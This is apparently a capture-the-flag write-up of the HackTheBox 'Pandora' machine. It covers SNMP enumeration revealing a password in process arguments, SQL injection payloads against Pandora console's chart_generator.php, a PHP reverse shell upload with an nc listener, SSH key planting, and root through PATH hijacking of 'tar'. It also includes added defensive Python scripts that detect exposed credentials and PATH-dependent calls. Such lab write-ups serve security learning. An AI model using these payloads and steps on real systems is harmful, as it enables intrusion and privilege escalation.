Pandora - [HTB]

Marmeus

Introduction

Pandora is an easy Linux machine from HackTheBox where you enumerate the SNMP service in order to find a running command with credentials passed as parameters. These credentials can be used to gain access to the machine as daniel. Then, there is a Pandora console only reachable through localhost, which requires port forwarding in order to exploit several vulnerabilities affecting that version of Pandora. Finally, you have to exploit a path hijacking weakness in a SUID binary to become root.

Enumeration

As always, let's start by scanning all open ports on the box with Nmap.

kali@kali:~/Documents/HTB/Pandora$ nmap -vv -sS -p- -n -T5 -oN AllPorts.txt 10.129.253.52
Nmap scan report for 10.10.11.136
Host is up, received echo-reply ttl 63 (0.18s latency).
Scanned at 2022-01-10 11:41:31 EST for 229s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63


kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sU -sC -sV 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.17s latency).
Not shown: 916 closed ports, 83 open|filtered ports
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 31
|_  snmpEngineTime: 4h00m19s
| snmp-interfaces:
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 1.26 Mb sent, 1.26 Mb received
|   VMware VMXNET3 Ethernet Controller
|     IP address: 10.10.11.136  Netmask: 255.255.0.0
|     MAC address: 00:50:56:b9:c2:f0 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 5.74 Mb sent, 6.19 Mb received
| snmp-netstat:
|   TCP  0.0.0.0:22           0.0.0.0:0
|   TCP  10.10.11.1362:36582  1.1.1.1:53
|   TCP  127.0.0.1:3306       0.0.0.0:0
|   TCP  127.0.0.53:53        0.0.0.0:0
|   UDP  0.0.0.0:68           *:*
|   UDP  0.0.0.0:161          *:*
|_  UDP  127.0.0.53:53        *:*
| snmp-processes:
[...]
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 4h00m19.29s (1441929 timeticks)
|_snmp-win32-software:
Service Info: Host: pandora

Then, we continue with a deeper scan of each open port to get more information about every service.

kali@kali:~/Documents/HTB/Pandora$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80 10.10.11.136
Nmap scan report for 10.10.11.136
Host is up (0.045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking for domain names on the web page to add to /etc/hosts, we obtain the following.

kali@kali:~/Documents/HTB/Pandora$ curl http://10.10.11.136/ 2>/dev/null | grep \.htb
                    <p>support@panda.htb</p>
                    <p>contact@panda.htb</p>

Accessing the web page, we can read about a monitoring solution.

Panda web page

Because UDP port 161 is open, let's use snmpwalk to enumerate the service; it reveals a running command with credentials passed as parameters.

kali@kali:~/Documents/HTB/Pandora$ snmpwalk -v 2c panda.htb -c public | tee snmpwalk.txt
[...]
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
[...]

These credentials can be used to log in as the user daniel through SSH.
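
The finding above is a classic case of a secret living in a process argument list: anything passed on a command line is readable by every local user through /proc/<pid>/cmdline and, as here, by anyone who can read the SNMP hrSWRun table. The following is an added example (not part of the original writeup) that parses snmpwalk-style HOST-RESOURCES-MIB lines and flags entries that look like they carry a credential; the sample output is constructed, with only the host_check line taken from the enumeration above.

```python
"""Flag credentials exposed in process argument lists (added example).

Parses snmpwalk-style HOST-RESOURCES-MIB::hrSWRunParameters lines and
reports processes whose arguments look like they carry a secret.
"""
import re

# Constructed sample modelled on the snmpwalk output above; only the
# host_check line comes from the writeup, the other processes are made up.
SAMPLE_SNMPWALK = """\
HOST-RESOURCES-MIB::hrSWRunName.971 = STRING: "bash"
HOST-RESOURCES-MIB::hrSWRunParameters.971 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunName.972 = STRING: "bash"
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.980 = STRING: "--config /etc/app.conf"
HOST-RESOURCES-MIB::hrSWRunParameters.981 = STRING: "--db-url mysql://app:S3cret@localhost/app"
"""

PARAMS_RE = re.compile(r'^HOST-RESOURCES-MIB::hrSWRunParameters\.(\d+) = STRING: "(.*)"$')

# Argument shapes that usually carry a secret, checked in this order.
SECRET_PATTERNS = [
    ("password flag", re.compile(
        r'(?:^|\s)(?:-p|--password|--pass|--passwd|--secret|--token)(?:\s+|=)\S+')),
    ("key=value secret", re.compile(
        r'\b(?:password|passwd|pwd|secret|token|api[_-]?key)=\S+', re.I)),
    ("credential in URL", re.compile(r'://[^/\s:@]+:[^@\s]+@')),
]


def find_exposed_credentials(snmpwalk_output):
    """Return (pid, kind) for every hrSWRunParameters entry that looks like
    it carries a secret; pids are ints so they can be matched against ps."""
    findings = []
    for line in snmpwalk_output.splitlines():
        m = PARAMS_RE.match(line)
        if not m:
            continue
        pid, args = int(m.group(1)), m.group(2)
        for kind, pattern in SECRET_PATTERNS:
            if pattern.search(args):
                findings.append((pid, kind))
                break  # one finding per process is enough for a report
    return findings


if __name__ == "__main__":
    for pid, kind in find_exposed_credentials(SAMPLE_SNMPWALK):
        print(f"pid {pid}: {kind} visible in process arguments")
```

The same regexes run just as well over `ps -eo pid,args` on the host itself, which is the cheaper place to catch this before an attacker does. The fixes are to hand secrets to host_check through an environment file or a configuration file with restricted permissions instead of argv, and to narrow what the SNMP community can read: Ubuntu's stock snmpd.conf ships `rocommunity public default -V systemonly`, which does not expose the hrSWRun table at all.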

Privilege Escalation 1

By enumerating the machine, we find a virtual host that is only reachable via localhost.

daniel@pandora:~$ cat /etc/apache2/sites-available/pandora.conf 
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

To reach it, we need to forward the port with the following command.

kali@kali:~/Documents/HTB/Pandora$ ssh -L localhost:80:localhost:80 daniel@panda.htb -fN

Now we have access to Pandora's console.

Pandora console

As we can see above, Pandora's version number is shown on the landing page. Looking for vulnerabilities, you can find the following post, which explains the SQLi login bypass. However, it doesn't show the payload in the proof of concept.

There are two ways of exploiting this part:

  1. Thanks to the SQLi, we can obtain matt's PHPSESSID, which lets us log in as matt. Then, we need another exploit to get RCE.
  2. Thanks to the SQLi and PHP deserialisation, we can log in as admin and upload a PHP reverse shell.

Exploitation 1

The payload to log in as matt is the following.

http://localhost/pandora_console/include/chart_generator.php?session_id=' OR `id_session`=(SELECT id_session from tsessions_php where data like '%matt%' LIMIT 1) LIMIT 1 -- -

Then, this post explains how to obtain remote command execution via the Events feature.

Exploitation 2

The payload to log in as admin is the following:

http://localhost/pandora_console/include/chart_generator.php?session_id=-1' UNION SELECT '<YOUR_PHPSESSIONID>', NULL, 'id_usuario|s:5:"admin";

Now, if we go to Admin tools / File Manager, we can upload a file such as /usr/share/laudanum/php/php-reverse-shell.php, which is stored under the /images/ directory.

kali@kali:~/Documents/HTB/Pandora$ curl -s http://localhost/pandora_console/images/shell.php &
kali@kali:~/Documents/HTB/Pandora$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.15.118] from (UNKNOWN) [10.129.253.52] 34170
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 21:23:15 up  7:56,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
daniel   pts/0    10.10.15.118     17:29   35.00s  0.72s  0.72s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)

Privilege Escalation

Thanks to linpeas, we can see a SUID binary that can only be executed by the user matt.

╔══════════╣ SUID - Check easy privesc, exploits and write perms
[...]
-rwsr-x--- 1 root   matt        17K Dec  3 15:58 /usr/bin/pandora_backup (Unknown SUID binary)

With ltrace, we can see that it doesn't use an absolute path when executing the tar command. Hence, we can use path hijacking to become root.

matt@pandora:/$ ltrace /usr/bin/pandora_backup
getuid()= 1000
geteuid()= 1000
setreuid(1000, 1000)= 0
puts("PandoraFMS Backup Utility"PandoraFMS Backup Utility)= 26
puts("Now attempting to backup Pandora"...Notow attempting to backup PandoraFMS client)= 43
system("tar -cvf /root/.backup/pandora-b"...tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                           = 512
puts("Backup failed!\nCheck your permis"...Backup failed!
Check your permissions!
)                                                     = 39
+++ exited (status 1) +++
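
The trace makes the weakness visible in one line: `system("tar ...")` names the program without a directory, so whichever `tar` appears first in the caller's `$PATH` is the one a root-owned process runs. (The `geteuid() = 1000` above is an artefact of tracing: the kernel does not honour the setuid bit for a binary traced by an unprivileged user, so ltrace shows the call sequence but not the privilege.) The following is an added example, not part of the original writeup or of PandoraFMS, that audits an ltrace capture for PATH-dependent command execution and lists the PATH entries that sit in front of the real binary's directory and are writable; the trace excerpt is constructed after the one above.

```python
"""Audit an ltrace capture of a setuid binary for PATH-dependent commands
(added example, not the writeup's or PandoraFMS's own code)."""
import os
import re

# Constructed excerpt modelled on the ltrace output above. ltrace truncates
# long string arguments with "..." so the regex stops at the closing quote.
SAMPLE_TRACE = """\
getuid()                                                   = 1000
geteuid()                                                  = 1000
setreuid(1000, 1000)                                       = 0
puts("PandoraFMS Backup Utility")                          = 26
system("tar -cvf /root/.backup/pandora-b"...               = 512
system("/usr/bin/tar -cvf /root/.backup/other.tar /srv")   = 0
"""

# Calls that hand a command line to a shell or resolve the program via $PATH.
PATH_SEARCHING_CALLS = ("system", "popen", "execvp", "execvpe", "execlp")
CALL_RE = re.compile(r'^(\w+)\("([^"]*)"')


def path_dependent_commands(trace):
    """Return (call, program) for each traced call whose program has no '/'
    and is therefore looked up through $PATH at run time."""
    found = []
    for line in trace.splitlines():
        m = CALL_RE.match(line.strip())
        if not m or m.group(1) not in PATH_SEARCHING_CALLS:
            continue
        call, command = m.groups()
        words = command.split()
        if words and "/" not in words[0]:
            found.append((call, words[0]))
    return found


def shadowing_dirs(path_env, real_dir, is_writable=lambda d: os.access(d, os.W_OK)):
    """PATH entries searched before real_dir that the current user can write
    to; each one could supply a look-alike binary. An empty entry means '.'."""
    shadowing = []
    for entry in path_env.split(":"):
        entry = entry or "."
        if os.path.normpath(entry) == os.path.normpath(real_dir):
            break
        if is_writable(entry):
            shadowing.append(entry)
    return shadowing


if __name__ == "__main__":
    for call, program in path_dependent_commands(SAMPLE_TRACE):
        ahead = shadowing_dirs(os.environ.get("PATH", ""), "/usr/bin")
        print(f"{call}() runs '{program}' via $PATH; writable dirs ahead of /usr/bin: {ahead}")
```

For the binary's author the remediation is the mirror image of what the audit flags: invoke `/usr/bin/tar` by absolute path, and either reset `PATH` to a fixed value before calling `system()` or, better, replace `system()` with `fork()` plus `execve()` and a controlled environment, since a setuid program must not let its caller's environment choose what it executes.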

However, for this to work we need to log in to the machine as matt through SSH.

matt@pandora:/home/matt$ mkdir /home/matt/.ssh/
matt@pandora:/home/matt$ chmod 0700 .ssh
matt@pandora:/home/matt$ echo "<Your_id_rsa.pub>" > /home/matt/.ssh/authorized_keys
matt@pandora:/home/matt$ chmod 0600 /home/matt/.ssh/authorized_keys
kali@kali:~/Documents/HTB/Pandora$ ssh matt@panda.htb

Finally, once logged in, we can become root by executing the following commands.

matt@pandora:~$ cd /tmp/
matt@pandora:/tmp$ echo "/bin/bash -p" > tar
matt@pandora:/tmp$ chmod +x tar
matt@pandora:/tmp$ export PATH=$(pwd):$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup 
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp# cat /root/root.txt
[CENSORED]